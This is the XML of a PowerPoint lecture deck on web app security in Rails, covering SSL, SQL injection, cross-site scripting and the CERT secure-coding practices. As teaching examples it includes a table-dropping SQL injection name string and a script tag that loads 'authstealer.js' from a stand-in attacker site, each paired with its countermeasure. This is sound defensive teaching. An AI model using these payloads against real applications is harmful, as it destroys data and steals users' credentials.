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258" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="260" r:id="rId5"/>
    <p:sldId id="261" r:id="rId6"/>
    <p:sldId id="264" r:id="rId7"/>
    <p:sldId id="265" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="267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8" r:id="rId21"/>
    <p:sldId id="280" r:id="rId22"/>
    <p:sldId id="282" r:id="rId23"/>
    <p:sldId id="283" r:id="rId24"/>
    <p:sldId id="284" r:id="rId25"/>
    <p:sldId id="266" r:id="rId26"/>
    <p:sldId id="285" r:id="rId27"/>
    <p:sldId id="286" r:id="rId28"/>
    <p:sldId id="259" r:id="rId29"/>
    <p:sldId id="281" r:id="rId30"/>
    <p:sldId id="53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CC33"/>
    <a:srgbClr val="FF6633"/>
    <a:srgbClr val="FF3333"/>
    <a:srgbClr val="FF6600"/>
    <a:srgbClr val="FFFF99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4"/>
    <p:restoredTop sz="94679"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="215" d="100"/>
          <a:sy n="215" d="100"/>
        </p:scale>
        <p:origin x="3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5D5D4C-6641-7E43-9123-EFA9944C219C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750866-DE83-9547-8FFD-58BBCE236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US-CERT is the Computer Emergency Response Team for the United States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A5B53B5-6017-404C-96BD-C45B30AFD00A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14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DEA7-3E79-2F4A-AAF4-25CE14C89C78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5E89-28BD-1243-B60C-DBDF9FA88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6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A1E2-CBED-A241-8BA8-3C6311CCEE17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5E5-DAC6-2B45-8D8F-B3DD76F49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7EC7-90AE-FE40-A8B6-FC707761C963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D65-8D5A-1046-AA5B-BC5726A72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FC33-1439-614A-A670-C0AA07D83A93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D18A-34CE-9042-8A4B-DCAFFFF83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398F-3DFE-8842-91CA-C7797D2CC0B1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0AEA-1010-EE4C-8787-1BDB38543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2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1CC2-A488-1E46-A77D-5830D5C8F1DE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652B-CD7E-1C45-93B0-066A78306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67BD-879E-814D-864E-7F2DF2752EF9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999-E805-9747-960D-DF639D4DE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5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4FDE-0F6C-0D47-83AA-4F99EB86A9AE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CFF9-3337-B447-B94F-8B0B60546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3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8858-79B7-6E45-AB49-1EE401385EED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12FC-22E3-DF45-A97D-7BD127C6D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0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BB63-26BC-6046-89CB-262590EF2D8D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FBA-8700-BE4D-85C3-9480221F3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5240-A3C6-DD43-B6AA-10AF529B1A4E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6193-BE21-8245-A83D-B65B8E73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0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24AD95-F66A-9D42-91B8-FDCF808917F5}" type="datetimeFigureOut">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>4/18/19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619FB4-FF6F-924A-9F32-F87C746CA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244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296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63538" y="5591175"/>
            <a:ext cx="7885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CC33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security: Attacks &amp; Countermeasures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8239125" y="3198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 bwMode="auto">
          <a:xfrm>
            <a:off x="342900" y="1476375"/>
            <a:ext cx="1877786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53416"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2220686" y="1476375"/>
            <a:ext cx="206630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r="27279"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4286993" y="1476375"/>
            <a:ext cx="2208811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5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6492650" y="1476375"/>
            <a:ext cx="231123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were the student records lost?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9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39125" y="3071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9375"/>
            <a:ext cx="845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194550" y="1677988"/>
            <a:ext cx="12319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9413" y="1931988"/>
            <a:ext cx="19573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were the student records lost?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9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39125" y="3071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9375"/>
            <a:ext cx="845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725" y="4427538"/>
            <a:ext cx="77025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The name string “Robert'); DROP TABLE Students;--”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u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> malicious code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But how can this happen?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94550" y="1677988"/>
            <a:ext cx="12319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9413" y="1931988"/>
            <a:ext cx="19573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2022" y="2173748"/>
            <a:ext cx="1295604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04083" y="2427748"/>
            <a:ext cx="1451026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controller that looks up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students by name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39775" y="182245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controller that looks up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students by name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39775" y="182245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79450" y="3141031"/>
            <a:ext cx="7742238" cy="2827338"/>
            <a:chOff x="679680" y="2753398"/>
            <a:chExt cx="7742227" cy="2826788"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26628" name="TextBox 3"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="679681" y="4626079"/>
              <a:ext cx="774222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urier New" charset="0"/>
                </a:rPr>
                <a:t>SELECT * FROM students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urier New" charset="0"/>
                </a:rPr>
                <a:t>WHERE name = '</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" b="1">
                  <a:solidFill>
                    <a:srgbClr val="00FFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" charset="0"/>
                </a:rPr>
                <a:t>Robert</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:latin typeface="Courier New" charset="0"/>
                </a:rPr>
                <a:t>';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9680" y="2753398"/>
              <a:ext cx="6838940" cy="453937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>
              <a:off x="4099150" y="3207335"/>
              <a:ext cx="0" cy="1418949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1" name="TextBox 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4265816" y="3457971"/>
              <a:ext cx="38379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Rails ORM translates to…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if…?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if…?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30263" y="3638331"/>
            <a:ext cx="8313737" cy="3083143"/>
            <a:chOff x="830916" y="3638606"/>
            <a:chExt cx="8313084" cy="3082825"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="28676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8"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5784672" y="4353004"/>
              <a:ext cx="3359328" cy="236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7" name="Group 8"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="830916" y="3638606"/>
              <a:ext cx="5549966" cy="2372468"/>
              <a:chOff x="830916" y="3638606"/>
              <a:chExt cx="5549966" cy="2372468"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="28678" name="TextBox 3"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="830916" y="4626079"/>
                <a:ext cx="554996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SELECT * FROM students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WHERE name = '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Robert';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DROP TABLE students;--</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US">
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>';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875502" y="3638606"/>
                <a:ext cx="0" cy="987541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SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>? 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SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>? 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05388" y="5285744"/>
            <a:ext cx="3106737" cy="1431925"/>
            <a:chOff x="5005966" y="4896772"/>
            <a:chExt cx="3105548" cy="14331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05966" y="4896772"/>
              <a:ext cx="31579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256695" y="5025473"/>
              <a:ext cx="610953" cy="500508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27" name="TextBox 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5705311" y="5375863"/>
              <a:ext cx="240620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Automatically </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" u="sng">
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>escapes</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="FF00FF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> input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DDBC9F-6232-CF4A-84F6-F6DD4D2AD77E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="246805" y="3356975"/>
            <a:ext cx="7150945" cy="1955756"/>
            <a:chOff x="246805" y="3356975"/>
            <a:chExt cx="7150945" cy="1955756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59331" y="3595056"/>
              <a:ext cx="7138419" cy="1717675"/>
              <a:chOff x="259568" y="3206465"/>
              <a:chExt cx="7138137" cy="1718120"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30728" name="TextBox 3"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="259568" y="4401365"/>
                <a:ext cx="71381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Student.where("name = ?", id)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602143" y="3206465"/>
                <a:ext cx="4762" cy="1216340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1" name="TextBox 7"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3671044" y="3420888"/>
                <a:ext cx="232840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FF00FF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Write like this!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D13B00-8107-9347-8B92-99B97665D3DD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="246805" y="3356975"/>
              <a:ext cx="6742718" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="50800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Translation becomes…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40FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Student.where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF40FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>("name = ?", id)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KAs covered so far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77825" y="990600"/>
            <a:ext cx="3263900" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF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738" y="1514475"/>
            <a:ext cx="8280400" cy="4189413"/>
            <a:chOff x="439738" y="1513690"/>
            <a:chExt cx="8279933" cy="4190424"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14347" name="TextBox 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6059702" y="2726649"/>
              <a:ext cx="265996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Today’s topic: Security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39738" y="5361131"/>
              <a:ext cx="3201806" cy="342983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966895" y="1513690"/>
              <a:ext cx="4435225" cy="1316356"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 4435929 w 4435929"/>
                <a:gd name="connsiteY0" fmla="*/ 1316595 h 1316595"/>
                <a:gd name="connsiteX1" fmla="*/ 3020786 w 4435929"/>
                <a:gd name="connsiteY1" fmla="*/ 191738 h 1316595"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 4435929"/>
                <a:gd name="connsiteY2" fmla="*/ 1238 h 131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5929" h="1316595">
                  <a:moveTo>
                    <a:pt x="4435929" y="1316595"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="4098018" y="863779"/>
                    <a:pt x="3760107" y="410964"/>
                    <a:pt x="3020786" y="191738"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2281465" y="-27488"/>
                    <a:pt x="0" y="1238"/>
                    <a:pt x="0" y="1238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3709804" y="3619223"/>
              <a:ext cx="3692317" cy="1895932"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 4435929 w 4435929"/>
                <a:gd name="connsiteY0" fmla="*/ 1316595 h 1316595"/>
                <a:gd name="connsiteX1" fmla="*/ 3020786 w 4435929"/>
                <a:gd name="connsiteY1" fmla="*/ 191738 h 1316595"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 4435929"/>
                <a:gd name="connsiteY2" fmla="*/ 1238 h 131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5929" h="1316595">
                  <a:moveTo>
                    <a:pt x="4435929" y="1316595"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="4098018" y="863779"/>
                    <a:pt x="3760107" y="410964"/>
                    <a:pt x="3020786" y="191738"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2281465" y="-27488"/>
                    <a:pt x="0" y="1238"/>
                    <a:pt x="0" y="1238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390526" y="3165475"/>
            <a:ext cx="4413250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1C2A2D3-741C-1D45-9D26-C7DCAEEA614E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="390525" y="2435637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Translation becomes…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?", id)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17550" y="3638331"/>
            <a:ext cx="7956550" cy="2457668"/>
            <a:chOff x="716760" y="3638603"/>
            <a:chExt cx="7956851" cy="2457397"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31748" name="Group 8"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="716760" y="3638603"/>
              <a:ext cx="6004217" cy="2372471"/>
              <a:chOff x="716760" y="3638603"/>
              <a:chExt cx="6004217" cy="2372471"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31750" name="TextBox 3"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="716760" y="4626079"/>
                <a:ext cx="600421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SELECT * FROM students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WHERE name = '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Robert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'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DROP TABLE students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;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-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-</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US">
                    <a:latin typeface="Courier New" charset="0"/>
                  </a:rPr>
                  <a:t>';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874417" y="3638603"/>
                <a:ext cx="0" cy="98753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749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611" y="4318000"/>
              <a:ext cx="2159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36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SQL injection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escaped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Micropost Example: What if…?</a:t>
            </a:r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Micropost Example: What if…?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96863" y="5337175"/>
            <a:ext cx="8389937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Blah blah…</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script src="http://mallorysevilsite.com/authstealer.js"&gt;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1446213" y="3773488"/>
            <a:ext cx="2595562" cy="1557337"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2595686"/>
              <a:gd name="connsiteY0" fmla="*/ 1557477 h 1557477"/>
              <a:gd name="connsiteX1" fmla="*/ 954842 w 2595686"/>
              <a:gd name="connsiteY1" fmla="*/ 389369 h 1557477"/>
              <a:gd name="connsiteX2" fmla="*/ 2595686 w 2595686"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 155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86" h="1557477">
                <a:moveTo>
                  <a:pt x="0" y="1557477"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="261114" y="1103212"/>
                  <a:pt x="522228" y="648948"/>
                  <a:pt x="954842" y="389369"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1387456" y="129789"/>
                  <a:pt x="2309852" y="71075"/>
                  <a:pt x="2595686" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="57150" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF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 rot="-2307342">
            <a:off x="1001713" y="3865563"/>
            <a:ext cx="171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User posts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Malicious script runs when feed loads!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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5337175"/>
            <a:ext cx="8389937" cy="9540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>
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blah blah…</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="595959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&lt;script src="http://mallorysevilsite.com/authstealer.js"&gt;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4468813" y="2725738"/>
            <a:ext cx="1612900" cy="2767012"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2595686"/>
              <a:gd name="connsiteY0" fmla="*/ 1557477 h 1557477"/>
              <a:gd name="connsiteX1" fmla="*/ 954842 w 2595686"/>
              <a:gd name="connsiteY1" fmla="*/ 389369 h 1557477"/>
              <a:gd name="connsiteX2" fmla="*/ 2595686 w 2595686"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 155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86" h="1557477">
                <a:moveTo>
                  <a:pt x="0" y="1557477"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="261114" y="1103212"/>
                  <a:pt x="522228" y="648948"/>
                  <a:pt x="954842" y="389369"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1387456" y="129789"/>
                  <a:pt x="2309852" y="71075"/>
                  <a:pt x="2595686" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="57150" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF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Left Brace 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4172744" y="1693069"/>
            <a:ext cx="584200" cy="8221662"/>
          </a:xfrm>
          <a:prstGeom prst="lef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cross-site scripting (XSS)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cross-site scripting (XSS)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Use Rails!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Hartl: “Rails automatically prevents the [XSS] problem by escaping any content inserted into view templates.”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4988" y="3198813"/>
            <a:ext cx="8074025" cy="2619375"/>
            <a:chOff x="534718" y="3198048"/>
            <a:chExt cx="8074571" cy="2620339"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1480932" y="3198048"/>
              <a:ext cx="6182143" cy="400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&lt;script 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src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="http://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mallorysevilsite.com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authstealer.js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"&gt;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4718" y="5418190"/>
              <a:ext cx="8074571" cy="400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lt;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script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 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src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=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quot;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http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://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mallorysevilsite.com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authstealer.js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&amp;quot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;&amp;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gt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;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00503" y="3598245"/>
              <a:ext cx="0" cy="1819945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00" name="TextBox 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4338518" y="4036122"/>
              <a:ext cx="3216798" cy="95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ERB translates variable values to…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3138" y="3495675"/>
            <a:ext cx="7261225" cy="2011363"/>
            <a:chOff x="973382" y="3495054"/>
            <a:chExt cx="7261021" cy="201174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973382" y="3495054"/>
              <a:ext cx="639744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475115" y="3495054"/>
              <a:ext cx="347652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396227" y="3495054"/>
              <a:ext cx="266693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27985" y="3523634"/>
              <a:ext cx="706418" cy="198316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9938" cy="4525963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SQL injection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escaped queries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Cross-site scripting (another type of injection)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Rails (escape text)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82282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Although these attacks are common,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there are many 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(e.g., cross-site request forgery –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see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hartl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Ch.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CERT Top 10 Software Security Practices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>
          <a:xfrm>
            <a:off x="457200" y="1025525"/>
            <a:ext cx="8229600" cy="5360988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Validate input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Heed compiler warnings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Architect and design for security policies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Keep it simple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Default deny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Adhere to the principle of least privilege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Sanitize data sent to other software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Practice defense in depth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Use effective quality assurance techniques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Adopt a software construction security standard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938838" y="6581775"/>
            <a:ext cx="320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Taken from https://www.securecoding.cert.org/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216025"/>
            <a:ext cx="8229600" cy="27574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For more attacks and countermeasures, see the Rails Security Guide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u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF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FFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>guides.rubyonrails.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>security.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" u="sng" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00FF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7600" y="2401888"/>
            <a:ext cx="436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I’ll unfold them one by one…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Encrypting communication with SSL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL injection attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CERT security practices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86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potential attack happens here?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1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6412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6413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6415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6416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6417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potential attack happens here?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7437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7438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7439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7440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7441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7442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78463" y="1763713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Eavesdropping, packet sniffing,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man-in-the-middle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Example: Unsecured Sign-Up Page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013"/>
            <a:ext cx="880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73213" y="3067050"/>
            <a:ext cx="3278187" cy="2143125"/>
            <a:chOff x="1573561" y="3066585"/>
            <a:chExt cx="3277219" cy="2143513"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18436" name="TextBox 1"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2248829" y="3698489"/>
              <a:ext cx="26019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Trivial for packet sniffer to steal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1573561" y="3066585"/>
              <a:ext cx="917304" cy="2143513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prevent?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83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9484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9485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9486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9487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9488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9489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prevent?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08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20509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20510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20512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20513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20514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78463" y="1646238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Encrypt communications with SSL (HTTPS)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enable site-wide SSL in Rails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457200" y="5070475"/>
            <a:ext cx="8229600" cy="9461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Also requires config on production server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>E.g.: Signed certificate</a:t>
            </a:r>
          </a:p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9144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768168" y="6367957"/>
            <a:ext cx="5375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Taken from https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>www.railstutorial.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>/book/ (3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Ed.) Listing 7.26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See also http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>guides.rubyonrails.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>configuring.html#rails-general-configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="12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1947</TotalTime>
  <Words>843</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>173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 Black </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SWEBOK KAs covered so far</vt:lpstr>
      <vt:lpstr>Three Common Web App Attacks and Countermeasures</vt:lpstr>
      <vt:lpstr>What potential attack happens here?</vt:lpstr>
      <vt:lpstr>What potential attack happens here?</vt:lpstr>
      <vt:lpstr>Example: Unsecured Sign-Up Page</vt:lpstr>
      <vt:lpstr>How to prevent?</vt:lpstr>
      <vt:lpstr>How to prevent?</vt:lpstr>
      <vt:lpstr>How to enable site-wide SSL in Rails</vt:lpstr>
      <vt:lpstr>Three Common Web App Attacks and Countermeasures</vt:lpstr>
      <vt:lpstr>Why were the student records lost?</vt:lpstr>
      <vt:lpstr>Why were the student records lost?</vt:lpstr>
      <vt:lpstr>Imagine controller that looks up students by name</vt:lpstr>
      <vt:lpstr>Imagine controller that looks up students by name</vt:lpstr>
      <vt:lpstr>What if…?</vt:lpstr>
      <vt:lpstr>What if…?</vt:lpstr>
      <vt:lpstr>How to prevent SQL injection? </vt:lpstr>
      <vt:lpstr>How to prevent SQL injection? </vt:lpstr>
      <vt:lpstr>Translation becomes…</vt:lpstr>
      <vt:lpstr>Translation becomes…</vt:lpstr>
      <vt:lpstr>Three Common Web App Attacks and Countermeasures</vt:lpstr>
      <vt:lpstr>Micropost Example: What if…?</vt:lpstr>
      <vt:lpstr>Micropost Example: What if…?</vt:lpstr>
      <vt:lpstr>Malicious script runs when feed loads!</vt:lpstr>
      <vt:lpstr>How to prevent cross-site scripting (XSS)?</vt:lpstr>
      <vt:lpstr>How to prevent cross-site scripting (XSS)?</vt:lpstr>
      <vt:lpstr>Three Common Web App Attacks and Countermeasures</vt:lpstr>
      <vt:lpstr>CERT Top 10 Software Security Practices</vt:lpstr>
      <vt:lpstr>For more attacks and countermeasures, see the Rails Security Guide  http://guides.rubyonrails.org/security.html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16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-11-30T16:57:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-18T20:29:29Z</dcterms:modified>
</cp:coreProperties>
</file>